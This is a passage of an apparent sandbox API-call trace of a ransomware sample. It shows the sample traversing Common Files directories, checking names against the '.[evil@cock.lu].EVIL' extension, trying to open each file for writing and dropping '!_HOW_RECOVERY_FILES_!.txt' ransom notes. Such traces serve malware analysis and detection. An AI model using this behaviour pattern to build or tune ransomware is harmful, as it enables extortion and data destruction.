| out: lpFindFileData=0x84b0fddf20) returned 1 [0090.031] wcsstr (_Str="en-US", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.031] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US") returned 49 [0090.031] wcscmp (_String1=".", _String2="en-US") returned -1 [0090.031] wcscmp (_String1="..", _String2="en-US") returned -1 [0090.031] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US") returned 0x31 [0090.031] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US" | out: _Destination="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US") returned 0x0 [0090.031] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\*") returned="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\*" [0090.031] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd740 [0090.031] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.031] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\.") returned 51 [0090.031] wcscmp (_String1=".", _String2=".") returned 0 [0090.031] FindNextFileW (in: hFindFile=0x84b11dd740, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0090.031] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.031] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\..") returned 52 [0090.031] wcscmp (_String1=".", _String2="..") returned -1 [0090.031] wcscmp (_String1="..", _String2="..") returned 0 [0090.031] FindNextFileW (in: hFindFile=0x84b11dd740, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0090.031] wcsstr (_Str="msadcer.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.031] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui") returned 65 [0090.031] wcscmp (_String1="msadcer.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.031] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msadcer.dll.mui") returned 0x0 [0090.032] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui") returned 0x41 [0090.032] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcer.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.032] GetLastError () returned 0x5 [0090.032] FindNextFileW (in: hFindFile=0x84b11dd740, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0090.032] wcsstr (_Str="msadcor.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.032] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui") returned 65 [0090.032] wcscmp (_String1="msadcor.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.032] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msadcor.dll.mui") returned 0x0 [0090.032] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui") returned 0x41 [0090.032] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msadcor.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.032] GetLastError () returned 0x5 [0090.032] FindNextFileW (in: hFindFile=0x84b11dd740, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0090.032] wcsstr (_Str="msaddsr.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.032] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui") returned 65 [0090.032] wcscmp (_String1="msaddsr.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.033] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msaddsr.dll.mui") returned 0x0 [0090.033] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui") returned 0x41 [0090.033] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msaddsr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.033] GetLastError () returned 0x5 [0090.033] FindNextFileW (in: hFindFile=0x84b11dd740, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0090.033] wcsstr (_Str="msdaprsr.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.033] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui") returned 66 [0090.033] wcscmp (_String1="msdaprsr.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.033] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msdaprsr.dll.mui") returned 0x0 [0090.033] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui") returned 0x42 [0090.033] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaprsr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.033] GetLastError () returned 0x5 [0090.033] FindNextFileW (in: hFindFile=0x84b11dd740, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0090.033] wcsstr (_Str="msdaremr.dll.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.033] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui") returned 66 [0090.033] wcscmp (_String1="msdaremr.dll.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.033] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msdaremr.dll.mui") returned 0x0 [0090.033] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui") returned 0x42 [0090.033] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" (normalized: "c:\\program files\\common files\\system\\msadc\\en-us\\msdaremr.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.033] GetLastError () returned 0x5 [0090.033] FindNextFileW (in: hFindFile=0x84b11dd740, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0090.033] FindClose (in: hFindFile=0x84b11dd740 | out: hFindFile=0x84b11dd740) returned 1 [0090.034] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US") returned 0x31 [0090.034] strlen (_Str="${KEY}") returned 0x6 [0090.034] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0090.034] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0090.034] strlen (_Str="${CODE}") returned 0x7 [0090.034] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0090.034] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.034] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.034] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\System\\msadc\\en-US\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.035] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0090.035] __uncaught_exception () returned 0x84b1160800 [0090.035] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.036] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.036] wcsstr (_Str="msadce.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.036] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\msadce.dll") returned 54 [0090.036] wcscmp (_String1="msadce.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.036] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msadce.dll") returned 0x0 [0090.036] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\msadce.dll") returned 0x36 [0090.036] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\msadce.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadce.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.036] GetLastError () returned 0x5 [0090.036] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.036] wcsstr (_Str="msadcer.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.036] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\msadcer.dll") returned 55 [0090.036] wcscmp (_String1="msadcer.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.036] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msadcer.dll") returned 0x0 [0090.036] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\msadcer.dll") returned 0x37 [0090.036] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\msadcer.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcer.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.037] GetLastError () returned 0x5 [0090.037] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.037] wcsstr (_Str="msadco.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.037] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\msadco.dll") returned 54 [0090.037] wcscmp (_String1="msadco.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.037] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msadco.dll") returned 0x0 [0090.037] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\msadco.dll") returned 0x36 [0090.037] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\msadco.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadco.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.037] GetLastError () returned 0x5 [0090.037] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.037] wcsstr (_Str="msadcor.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.037] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\msadcor.dll") returned 55 [0090.037] wcscmp (_String1="msadcor.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.037] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msadcor.dll") returned 0x0 [0090.037] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\msadcor.dll") returned 0x37 [0090.037] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\msadcor.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadcor.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.038] GetLastError () returned 0x5 [0090.038] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.038] wcsstr (_Str="msadds.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.038] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\msadds.dll") returned 54 [0090.038] wcscmp (_String1="msadds.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.038] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msadds.dll") returned 0x0 [0090.038] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\msadds.dll") returned 0x36 [0090.038] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\msadds.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msadds.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.038] GetLastError () returned 0x5 [0090.038] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.038] wcsstr (_Str="msaddsr.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.038] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll") returned 55 [0090.038] wcscmp (_String1="msaddsr.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.038] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msaddsr.dll") returned 0x0 [0090.038] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll") returned 0x37 [0090.038] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msaddsr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.038] GetLastError () returned 0x5 [0090.038] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.038] wcsstr (_Str="msdaprsr.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.038] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll") returned 56 [0090.038] wcscmp (_String1="msdaprsr.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.038] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msdaprsr.dll") returned 0x0 [0090.038] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll") returned 0x38 [0090.039] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprsr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.039] GetLastError () returned 0x5 [0090.039] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.039] wcsstr (_Str="msdaprst.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.039] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll") returned 56 [0090.039] wcscmp (_String1="msdaprst.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.039] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msdaprst.dll") returned 0x0 [0090.039] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll") returned 0x38 [0090.039] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaprst.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.039] GetLastError () returned 0x5 [0090.039] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.039] wcsstr (_Str="msdarem.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.039] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\msdarem.dll") returned 55 [0090.039] wcscmp (_String1="msdarem.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.039] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msdarem.dll") returned 0x0 [0090.039] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\msdarem.dll") returned 0x37 [0090.039] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\msdarem.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdarem.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.039] GetLastError () returned 0x5 [0090.039] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.039] wcsstr (_Str="msdaremr.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.039] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll") returned 56 [0090.039] wcscmp (_String1="msdaremr.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.040] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msdaremr.dll") returned 0x0 [0090.040] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll") returned 0x38 [0090.040] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\msdaremr.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdaremr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.040] GetLastError () returned 0x5 [0090.040] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.040] wcsstr (_Str="msdfmap.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.040] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll") returned 55 [0090.040] wcscmp (_String1="msdfmap.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.040] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msdfmap.dll") returned 0x0 [0090.040] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll") returned 0x37 [0090.040] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\System\\msadc\\msdfmap.dll" (normalized: "c:\\program files\\common files\\system\\msadc\\msdfmap.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.040] GetLastError () returned 0x5 [0090.040] FindNextFileW (in: hFindFile=0x84b11dd080, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0090.040] FindClose (in: hFindFile=0x84b11dd080 | out: hFindFile=0x84b11dd080) returned 1 [0090.040] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\msadc") returned 0x2b [0090.040] strlen (_Str="${KEY}") returned 0x6 [0090.040] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0090.040] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0090.040] strlen (_Str="${CODE}") returned 0x7 [0090.040] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0090.040] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.040] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.040] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\System\\msadc\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.041] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0090.041] __uncaught_exception () returned 0x84b1160800 [0090.041] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.041] FindNextFileW (in: hFindFile=0x84b11dd7a0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0090.041] wcsstr (_Str="Ole DB", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.041] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB") returned 44 [0090.041] wcscmp (_String1=".", _String2="Ole DB") returned -1 [0090.041] wcscmp (_String1="..", _String2="Ole DB") returned -1 [0090.042] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB") returned 0x2c [0090.042] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\System\\Ole DB" | out: _Destination="C:\\\\Program Files\\Common Files\\System\\Ole DB") returned 0x0 [0090.042] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\*") returned="C:\\\\Program Files\\Common Files\\System\\Ole DB\\*" [0090.042] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11dd680 [0090.042] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.042] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\.") returned 46 [0090.042] wcscmp (_String1=".", _String2=".") returned 0 [0090.042] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.042] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.042] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\..") returned 47 [0090.042] wcscmp (_String1=".", _String2="..") returned -1 [0090.042] wcscmp (_String1="..", _String2="..") returned 0 [0090.042] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.042] wcsstr (_Str="en-US", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.042] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned 50 [0090.042] wcscmp (_String1=".", _String2="en-US") returned -1 [0090.042] wcscmp (_String1="..", _String2="en-US") returned -1 [0090.042] wcslen (_String="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned 0x32 [0090.042] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US" | out: _Destination="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned 0x0 [0090.042] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*") returned="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*" [0090.042] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dde60 [0090.042] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.042] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\System\\Ole DB\\en-US\\.") returned 52 